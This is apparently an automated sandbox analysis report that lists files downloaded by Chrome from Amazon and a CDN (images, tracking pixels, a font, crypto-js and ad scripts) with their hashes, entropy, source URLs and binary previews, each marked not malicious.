                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@.?.."..........6...................................................................c......T.wulU4..SAlU4..SAlU4..S@A...Z..H<..g7.U.{K0.Yv..j...T.[.M..T.[.M..T.[.M..a......6*u>..s$..... ..eH.."I./,.y.&.b.&.b...7 ...3...... .z.&.b.&.b.&.b.&T......%.8@.....Q..]...:........V.k....82.-)%...9..~...x...D=..qiO.Kf.............S.....S._T....K.9Ug.g.3ep#l.\....:y.3..> .8...s...A...40...B8juZ.}..Mm~....,......B5.6.4.@...*.e....v.d.x".p=W...X...l....i..be.....yc.....eC..5~Qt.t..+...l.]rV.......207].....7".F...C.J~............Z:_....a.......2./y?@q...2...-U"T.V`......5.}..c.y7Yb..r...H...79S...A.40@...[fq.Q.L.....@....?.,\..v.fS]........[a.|..?5.O...Z....u.Z....7..V.%..0l;.V.:...NM....C.........O...?...s2>.k.......W.,...T.X..{X....h.{...;`...U~.u..s..~...A.s5.>.t.,.*.9C."..P..?n%.+.6.[.T...R..a...7O
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 166x320, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):18097
                                                                                                                                                                                                                                                                      Entropy (8bit):7.9701163790425165
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:QY+K+3U+YPFFffo1hXWYs9fbeGdrsSQPp25l8cZJ+xXx:P+K+EhFZfoaY+0U5XZgxXx
                                                                                                                                                                                                                                                                      MD5:B1D688FC60FEE77E6506BE9649C34261
                                                                                                                                                                                                                                                                      SHA1:CEB0D6FCCADB18337ED41899F38F62A43978C848
                                                                                                                                                                                                                                                                      SHA-256:8ACB615C5ADF5B6AACCE1BDE7C01C8E8B06F69AA707921C967BBA974ED769985
                                                                                                                                                                                                                                                                      SHA-512:44F7DE7FCCFE3B8264B1254C15FCB42D954D96132CFBE9D8B60B4D8C3B9F9356E3B6E8C7BC22D14233691785B719C63144D925A2170B48945824090B9A401E94
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/81JN+zuPtWL._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......@...."...............................................................!..1."AQ.#2aq..B...$3Rr....4b..%Cst......&S...6cd.....................................................!1AQq..2a.."3......#.B...br.............?..%!.1.#..7bp...['.u8\...!....,..W......G...`............e+._<y.\E.b~xw..Ny...B....q..E..H\/H\3.@`E..z....\c..O...q....C.q.m'.,.4.w-.Z..q.w8...U$...,yH.Ky...5F-Z1m.....p...Eb..$R..\..#P...k4.......5.M..fe........O.J.P...JG......).M.{06'.{........}...a.P..S.....3...2.fsx.P}CH$.[.[...^......m..._..$.Z..Q.D..m.....Y.c}.o...6zq?a....da.+.y,T..eE.L..k......Vj..>6...c..N3.3."..~P.M.W......i.@.s.>........c$..n...R....b...d*b...1.....&&...T'.W..$_...M\).E.1....k...E../.*...FE..y.q.za...Gqt........q...`/.1w0. ..xn..T+FN."mF....-...<e)b..O...MQY.ze...YH.....XH.8.......`....]..F.6J.2[l%...4........=1.
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):39588
                                                                                                                                                                                                                                                                      Entropy (8bit):7.951269065390308
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:8wTP7nctQ5TQWIMdy2B7rptNxyY1skUA0Vvn3ZnajvK8mVrqYygr1X5r:TPwmXQ0HTNxym0V3ZnajS8mZxr
                                                                                                                                                                                                                                                                      MD5:A3E2EDBF849F0DA6A7B6B70E617363BB
                                                                                                                                                                                                                                                                      SHA1:B8568511F38B26012815EE56BC63072A2306E759
                                                                                                                                                                                                                                                                      SHA-256:9A0A411DBB9C2F5A8763708AA4AB71F5B36F9BCD89476FB81D36DF14E4F3230C
                                                                                                                                                                                                                                                                      SHA-512:C76FC93DD481C277F626F74CC30A26F9795F8D6354FF422E1A5320739454AAE0AB78CD22C25C8E58D893506ECE20573FE611C2589BAB2C85F03BBB45F9F33A11
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/Merchandising/BudgetStore/XCM_Manual_1349259_3986215_UAE_Budget_Store_AE_xsite_bubbler_generic_en_400x400_2X._CB644457596_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF......................................................................................................................................................................;.................................................................................5.......Z.9....ao_..&..L..Th.}.c.W.'....]...V.................>>fPL+.z.......ee0.....z..l..mget&..L.z............>...[.zE...V.}..........8cw;}.].m/8.*.........../35......}w.,........P..+fR.6$...IO.X..9.%,sbI......E..F.}...........cf-/h7I.a.}M....d.*4.1t..lIO.X..:.%,ub..jX..&...A.....l0......5g.{..+......8....c..o|..{E.........e..=)..!.p........{[..@?D\.............6{.m..........{^..j...M........y..~..Y.Z.7g..O....k.......7Y.gI..........C.....iO.0....h?Kz...F.......d.ZN.8.... ......^~.....c.....A8.(x......2V..a.V..G2..K...o..D...,N...r.?=........M.~.4..t.[...*.<.~Rya...o.^.]B....r.fo.e.*.!......./......Q.........q|...Xs.b..r..p.}^9yW.6...e@.....6....z..@.......J.[`.o.M.g....n.......x7..uoj.t.N...rW.<..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 160x200, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):5416
                                                                                                                                                                                                                                                                      Entropy (8bit):7.91628143103712
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:TQ3vhm5f8mkjAiL3DNjLY0D92xTxN7WxzRQhE51FJIIpRwxbHiJl:kfhmajHL3DNjLbyxNcQhE517IIp+xbSl
                                                                                                                                                                                                                                                                      MD5:E928724D871A6353C181094C8CF9BB19
                                                                                                                                                                                                                                                                      SHA1:696FB62AD3038D1526013A0C8CEBDC13E96E1B9A
                                                                                                                                                                                                                                                                      SHA-256:91C5FCE4721FBFCBAB6F7320F43394F74C1F02FE04EEC53CB1D240AB54727D20
                                                                                                                                                                                                                                                                      SHA-512:E0EE72AB4D2B44FA52AE5ACCB6119E8F2E42CAE4B76F8B949954D98DA80FCD594899045ED2A0400482F3E35B01611268E9A773878A5459BE4040AE402E8C001A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/41aNmwLQvxL._AC_SY200_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..............................................................!1A...Q"2aq..BRr.....#b....3CSs.%TU......4D.....................................................?..tQE.E.P.QE.F...:.Y.3..#@Y..U.'..9...Q.F.....)._..........R..k.U..E*..;x.N)..h.l... .>*.QH..vc....TSW....m..x...?*.wL.....op...p.....e>G*...VX......A.y....T...5n..s.$..e._c.M..AeQ^l5...}W...A.jz..z.(....(.(....(.(....(..\x....p_.......j.X..%`9F1.<[.TFS..8.]...\.....\...e.97&_q..n......8z....)Li...i.Y*..s..Oq...Ue..'.r.....P<Y..HINGG....?...Z&...g.|..P=.M......O5..c...:q.(....(.(....(.+.UX.....A_.]...m. ...e.q.>....A.i6.`...........y..#.J.".u.j.W...0.._JH}.z}Z....,E.....XY...v..]..w.e..?...p..A..N..2Dce8 ..O...R....Ww<P.Q....5.W)..h.EtR@....:59.".,......X_..F..^_W.....^Z=..B[,.....8.NA..#.[&..........f.S..E..(....(.(.......k.p....P..0...N.....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):9416
                                                                                                                                                                                                                                                                      Entropy (8bit):7.858682165622051
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:Yz5bN2/h9nsM4q9xe9XBfssssssssssLQkVts7uxjCG6IimDB:M2/yqbe7ssssssssssLQkVa7uxjZnDB
                                                                                                                                                                                                                                                                      MD5:66FD5911E870575C02253E729B4DBEFE
                                                                                                                                                                                                                                                                      SHA1:348414EAEBDB79AC5C031F2081FCD84FDF066C4B
                                                                                                                                                                                                                                                                      SHA-256:D4E22F8480F3D391BF5CD2255CBA9CA5322CCDF7C5853671D6CC21FE12E870E6
                                                                                                                                                                                                                                                                      SHA-512:70B7D7DC3F99D540A759148ABC81FB9CE7921FB2CE449B87129809F858427296C421A6E2869447744EF8FD4DC270A7980461F060C986423709972A0CBEFE166B
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................................................................................................................."..........4...........................................................................x8.}W.=.).{r...-......{...............[}.. .........=..{..5..t.[).l."..........=..i.V.C`......=.....2..L...D:........4q...KD<......m,..Y.Y.....;..Vt..I>:\Mh#....Oy.....H$.......C...Q......%..9YVN....tyYR.....{=O<X......N~..nBH@....=.i.5......Mh..86.....f.._.'....?.0........z.}.......{sF..C`.....b-h...-.*.*........q.;...d.y.............'..].GP.........=..x.......x........W..H........Y.............`.......|...E...G.....@.......%..)w........~.N..r./(..a...G......oS.y..{......JaCT.........w.gI.X..N...F.^..w.....~n;.n}|..G.s.uC.>.......647..*.)..R......u..t...&..&..6..{.~8............)5 .Km.s..q......ZZS.].S\.y........]/7.gJ.....Z.[.px..:.....v...$......~g'U..._E .........k...{..|.........t......4;..<
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, baseline, precision 8, 440x400, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):50490
                                                                                                                                                                                                                                                                      Entropy (8bit):7.96203292149151
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:sjyo6w60YhJ9CP9jPS/8A9ceZYLZlHaXcvWHdqxTA7XhHBCwxiwE9Wzw+kQrhw:sjy6Yh2PXAmyYTBxk7XF7cQzw+kQrhw
                                                                                                                                                                                                                                                                      MD5:1DA2F73A7A993BE1CAD7B68EFF657265
                                                                                                                                                                                                                                                                      SHA1:A79D16133B78FD787571D8E20A5223215D0C1136
                                                                                                                                                                                                                                                                      SHA-256:56B3044E00D9F43F098546775DBB61FC8BE8EAB472F5770FEF649990B64E833E
                                                                                                                                                                                                                                                                      SHA-512:2247E11E8EA74504D8177B8F939C07A2B8DCF87654B44F81E644E059EA49B6B7C81A388097A18969C37655E12C7C5AF71FED5B2BEB1BE1CCACA924D7E539B940
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:.....C....................................................................C............................................................................"...........................................I...............................!.1.."AQa.#2q..3..$%....&R.'45CHTU........................................G..........................!.1.."A.#2Qqa..$..3B%&RUbcr.CEFSV......................?...1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..;....1......1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc..).../...........ww...|R..1Jc..).c..1.R..1Jc..).c..1.R..1Jc........=.....`.....J........N..E...x.!..Z$
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.7374910194847146
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUnl/7yltxlHh/:/+/
                                                                                                                                                                                                                                                                      MD5:07FFF40B5DD495ACA2AC4E1C3FBC60AA
                                                                                                                                                                                                                                                                      SHA1:E8AC224BA9EE97E87670ED6F3A2F0128B7AF9FE4
                                                                                                                                                                                                                                                                      SHA-256:A065920DF8CC4016D67C3A464BE90099C9D28FFE7C9E6EE3A18F257EFC58CBD7
                                                                                                                                                                                                                                                                      SHA-512:49B8DAF1F5BA868BC8C6B224C787A75025CA36513EF8633D1D8F34E48EE0B578F466FCC104A7BED553404DDC5F9FAFF3FEF5F894B31CD57F32245E550FAD656A
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://aax-eu.amazon-adsystem.com/e/loi/imp?b=JAKDJS-_leRj6u0GB5k5iGoAAAGRdjLk2AMAAAH2AQBvbm9fdHhuX2JpZDEgICBvbm9fdHhuX2ltcDEgICA160AL
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):4058
                                                                                                                                                                                                                                                                      Entropy (8bit):7.670685813872088
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:96:R90kUkg7u9q9VQxAsCHZou955WwkyEoH7+Mj7EE5TR:gLeq9Vg2DPqM8EL
                                                                                                                                                                                                                                                                      MD5:AD2F396F894FB5783BC9B0C129CF1E9D
                                                                                                                                                                                                                                                                      SHA1:2995D29D1633819C92370AAEBFC7099F86668B40
                                                                                                                                                                                                                                                                      SHA-256:74D21ED6150E08EDDA27FD3A4A09442A476F50F62A8050E82488DBCB172CB399
                                                                                                                                                                                                                                                                      SHA-512:CFA4CCDCDBE0C364828820F9B3D1C9C4C7D872E14E616CE595390EBA6556FB8333B2AA9840226045940EEEC1B99445DC3EFE7959EE31BD29FA983CDF55A67549
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/G/39/CONSUMABLES23/EVENTS24/BTS24/QC/2407GH025_18_BTS24_AE_GW_QC-CROSSA_DQC_CL_Beauty_186x116_EN._SY116_CB566993070_.jpg
                                                                                                                                                                                                                                                                      Preview:......Exif..II*.................Ducky.......(......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.a6a63968a, 2024/03/06-11:52:05 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:676F8B9C478A11EFBAE58FF32B0F82A0" xmpMM:InstanceID="xmp.iid:676F8B9B478A11EFBAE58FF32B0F82A0" xmp:CreatorTool="Adobe Photoshop 2024 Macintosh"> <xmpMM:DerivedFrom stRef:instanceID="1D2D8B369F8CAF40DBD3A97E2A12B827" stRef:documentID="1D2D8B369F8CAF40DBD3A97E2A12B827"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...!Adobe.d........................................................................$$''$$53335;;;;;;;;;;.............................%......% #...# ((%%
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):43
                                                                                                                                                                                                                                                                      Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                                                                                      MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                                                                                      SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                                                                                      SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                                                                                      SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):167
                                                                                                                                                                                                                                                                      Entropy (8bit):5.132546184920958
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:3:PouVIZxocJ+qlkGOcFSKPCxvZ60WaNXbZ6+3vLs+BvGXI9F4:haxB0qlkGOqRGMJaNX96IvLsmdI
                                                                                                                                                                                                                                                                      MD5:F5798DCCC61EDD628837F9B5144BF86A
                                                                                                                                                                                                                                                                      SHA1:2F398E55567B1174361558546A70C4C534D7E895
                                                                                                                                                                                                                                                                      SHA-256:51700D49912F30C915141A5A58C5D27990F2B37A3CC109538E20DA5B33311FE6
                                                                                                                                                                                                                                                                      SHA-512:7E6A1BBEB1159D733DEADD362408E9FC8B535312CD14FF0FB2ED458B00DFC5E9A5C65FD3ACB134364D060916969DD5A7BB05AD86B2BAF5AFA025048E35612176
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://images-eu.ssl-images-amazon.com/images/S/apesafeframe/ape/sf/desktop/sf-1.50.f3986821.html
                                                                                                                                                                                                                                                                      Preview:<!DOCTYPE html><html><head><style>body{background-color:transparent;margin:0;padding:0}</style></head><body> <script src="sf-1.50.af25278b.js" ></script></body></html>
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 320x246, components 3
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):27711
                                                                                                                                                                                                                                                                      Entropy (8bit):7.980090824368657
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:fYipwiiuXkVOp7nmarrcExF9x0V1hiiVAGUDKbCjgfCJKAlhgVtj0wthZppbEEcD:f/2LVOVm4JF94fNUDK/aVCDNvbo
                                                                                                                                                                                                                                                                      MD5:13B56BAB6FC4CFB3AC4F106A2D007F5F
                                                                                                                                                                                                                                                                      SHA1:2A19923BC30CF38AC1FF5C7EB1963AD56145F603
                                                                                                                                                                                                                                                                      SHA-256:081DE08562FD38575618A8C2E979703B6CE8810740FF8CFC431CF557065F8FAB
                                                                                                                                                                                                                                                                      SHA-512:D95119AECBB399F7F9D0605167F63792899EB289AA1103EE7FFA360783EAD880897EC9400E991A446EC9FF487AAF67EAB00B7902A5CD1DE7C5A2E178C744E16F
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://m.media-amazon.com/images/I/81SRWfeAUXL._AC_UL320_.jpg
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*........@.."..........5..................................................................k..$.L0...2.......3...!O...4.k....;N..-.f.YF5.....X.y...slN.g..^/.y.1...%..qy.........e.x.....rg....w...z.,vc.&.........\..o)..;.....l,.j.hgRB6G..b.._/c.?..p`d.C...t...J.\.Z..&..u...t..re0..N.[r...J.q}..He.My..'..4.D...\.......9....*..w..f-.).V...<c.g....e${...ih.?.....d.......%..]uq\...&.:...,...|.:W'..R..W.9msN...!.2..2*./.G...v'O.W..$q.O..\.,.......]:..{[.h.......(.........,..^.G....../X."..L.....{.f...).z...$.x.ER(..<Y.i.i...........^\.&...l..Z.%......n...s.^E...'=....-.D..L.....s..........N...w.<w=o8^.fm.R~=..f......Lb.B.--..Vr..r5.Bu..'0Ih.I.s.*......Z*o.r...!...W.x..r..=..2~....:../...<^./|.d..l..M.)?`.n.2G.).^*....e..2...c...S....4C*=.]..4.c.)......h.S..{`P..$}..U..*..v....z...{HJ..V...7,._.p.Q_gF.%..
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (47992), with no line terminators
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):47992
                                                                                                                                                                                                                                                                      Entropy (8bit):5.605846858683577
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:768:LuxoaUN4+OIhwP53+e0QfA31jQM9OT81NHv4rnwfe:LuxoaU2+LwB2+G1ZdvCwfe
                                                                                                                                                                                                                                                                      MD5:CF3402D7483B127DED4069D651EA4A22
                                                                                                                                                                                                                                                                      SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                                                                                                                                                                                                                                                      SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                                                                                                                                                                                                                                                      SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
                                                                                                                                                                                                                                                                      Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (11115), with no line terminators
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):11115
                                                                                                                                                                                                                                                                      Entropy (8bit):5.337650855535322
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:1pbJWreb26qpOaby4gajwJeY1WOO5wKZBBOlIY44Bqb/tS:Mreb2thY5STJbQ
                                                                                                                                                                                                                                                                      MD5:BF4E1F374BB39E19D3D0E4FDEC6B1262
                                                                                                                                                                                                                                                                      SHA1:033CBD9D3A22FEA4F68382D2EA288F02AE49D44C
                                                                                                                                                                                                                                                                      SHA-256:9ECC35EB2B04506198971EA8AE65DAAABB0E722A6BBC0950719B19B69FD4B043
                                                                                                                                                                                                                                                                      SHA-512:C148107964C11BD6AFAB3D585EB4C60B7CC813F6B53B36CDA251E8BA086FA613220E70EF471D0204DB128C8478C00DDDA22655D28EDF79A45A06931B8B2EA0AD
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:var DACXImageTemplateCreative=function(e){var n={};function t(r){if(n[r])return n[r].exports;var o=n[r]={i:r,l:!1,exports:{}};return e[r].call(o.exports,o,o.exports,t),o.l=!0,o.exports}return t.m=e,t.c=n,t.d=function(e,n,r){t.o(e,n)||Object.defineProperty(e,n,{configurable:!1,enumerable:!0,get:r})},t.r=function(e){Object.defineProperty(e,"__esModule",{value:!0})},t.n=function(e){var n=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(n,"a",n),n},t.o=function(e,n){return Object.prototype.hasOwnProperty.call(e,n)},t.p="",t(t.s=15)}([function(e,n,t){"use strict";var r="undefined"!=typeof MSFClient&&MSFClient;n.a=r},function(e,n,t){"use strict";t.r(n),t.d(n,"readStringFromCookie",function(){return u}),t.d(n,"writeString",function(){return i}),t.d(n,"readString",function(){return a}),t.d(n,"write",function(){return c}),t.d(n,"read",function(){return f}),t.d(n,"isSupported",function(){return l});var r=864e5,o=365;function u(e,n){var t=function(e){if("string"!=typeo
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 232x200, components 3
                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                      Size (bytes):11015
                                                                                                                                                                                                                                                                      Entropy (8bit):7.9252476272150485
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:192:4er8t9EeYG8Ddk/5cJrpaITUzlVX0SMRJnTs9g6vwLa5m:VrFeYGMZSVXiJnnzV
                                                                                                                                                                                                                                                                      MD5:7F2D22CD4438E550E9EFABF9FE51C8D9
                                                                                                                                                                                                                                                                      SHA1:0048115EE769A19372CEED40B2F99C7952289A38
                                                                                                                                                                                                                                                                      SHA-256:078FB005BED69CBCC4AAE451E6A01495817A37A747DAF312407218F79CE6DC56
                                                                                                                                                                                                                                                                      SHA-512:7AEF04A9B3E4A443A312AC13666A412724F8CF5F36C8BBBC1D326744DFC447E5C93F806A885B10BB1FA969526D361AB731CFF44DA81A6494929011F249CB5315
                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                      Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........4.................................................................`.........B..pUS.4NX................i/..2.:.e..w............>u....[..>34....b.g......+jW............Tn=B..&.Z...WkcP......!......).Wo.S....Jh.r.H\q..5-....=.......'...,5....ZB.[..c.B..`..i<....Zks.]..].Qu.)vQ/z{].:.z...^h..............W.AZ.[#],...S.O@............:.fN.l...V.D......S0.{.;#V...d..|.....6b......*X....U.l.......NZ.Zl9...V.Q.K4.n2l......-.V..z_.{.....G....5...&...Y8..W..c....{..3..,.7..AG,.@.oev..$.jY.*.,@Q...<...+.4...U...T..o....0JabE..?.....L..,..,4Yu..O.Q.bf....]zg9.fE...I.pkdQ.)....3.....]h.'yh.......pk.l..:.GwQ...!"zN.p.wq+..g.m.=.SWTm.Y-...Xao....y..............yf.3.@*...p..:w.9...5I;...3.s.......~M....r...9..\....3.p.l...........UZ..$..YJ..}...(.<./E.T.................0..x..h....@?...2.....
                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      File Type:Web Open Font Format (Version 2), TrueType, length 16616, version 1.655
                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                      Size (bytes):16616
                                                                                                                                                                                                                                                                      Entropy (8bit):7.986966282975233
                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                      SSDEEP:384:0qJzQ61qLjMj2JfDC3uq2B/YgduJyovfw4TQRJGL7VGhX8aJl/hObP:x8LHMjGbCeqEFuBwkqJGLhGhVLsP
